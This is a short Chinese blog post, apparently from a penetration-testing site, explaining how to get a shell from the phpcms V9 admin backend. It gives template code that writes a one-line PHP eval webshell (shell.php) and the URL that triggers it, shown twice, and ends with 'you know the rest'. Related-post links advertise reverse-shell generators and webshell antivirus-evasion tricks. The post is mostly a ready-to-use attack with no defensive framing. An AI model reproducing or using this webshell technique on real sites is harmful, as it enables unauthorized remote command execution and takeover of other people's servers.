phpcmsV9后台拿shell

发表于 2012年08月22日
Vulndb

search目录下面的index.html右侧的编辑
修改其模版为：

<?php 
$shell
= 
'<?php @eval($_POST[cmd]);?>'
;
file_put_contents
(
'shell.php'
,
$shell
);?>

1

2

3

4

5

6

7

8

9

10

11

<?php

$shell

=

'<?php @eval($_POST[cmd]);?>'

;

file_put_contents

(

'shell.php'

,

$shell

);?>

提交保存

然后访问：localhost/index.php?m=search

会在根目录生成一个shell.php的一句话
然后你懂的

标签：Phpcms , phpcmsV9 , shell 原文连接：phpcmsV9后台拿shell 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

Python版phpcmsV9自动写shell php webshell免杀工具

渗透测试-权限维持

CLI生成多语言反弹Shell：Shellerator

CLI生成多语言反弹Shell：Shellerator

使用HTTP协议的异步反向Shell/反弹Shell

使用HTTP协议的异步反向Shell/反弹Shell

回调函数绕过D盾小套路

回调函数绕过D盾小套路

AntSword（蚁剑）UA修改

AntSword（蚁剑）UA修改

disable_functions Bypass：突破disable_functions达到命令执行的Shell

disable_functions Bypass：突破disable_functions达到命令执行的Shell

Python编写的反弹shell生成器：revshellgen

Python编写的反弹shell生成器：revshellgen

一款Oracle数据库命令执行工具：oracleShell

一款Oracle数据库命令执行工具：oracleShell

Mos macOS下平滑鼠标滚动/滚动方向小工具

Mos macOS下平滑鼠标滚动/滚动方向小工具

Flutter 中设置 Google Maps 样式深色模式

Flutter 中设置 Google Maps 样式深色模式

解决WordPress上传svg/ico/webp，您无权上传此文件类型

解决WordPress上传svg/ico/webp，您无权上传此文件类型

cursor, 一款基于 vscode 的 AI IDE

cursor, 一款基于 vscode 的 AI IDE

git 设置和取消代理

2024免费在线影视/动漫番剧优质网站，合集汇总更新

2024免费在线影视/动漫番剧优质网站，合集汇总更新

解决Xcode：Unable to boot device because it cannot be located on disk.

解决Xcode：Unable to boot device because it cannot be located on disk.

Flutter使用JsBridge方式处理Webview与H5通信

Flutter使用JsBridge方式处理Webview与H5通信

N/A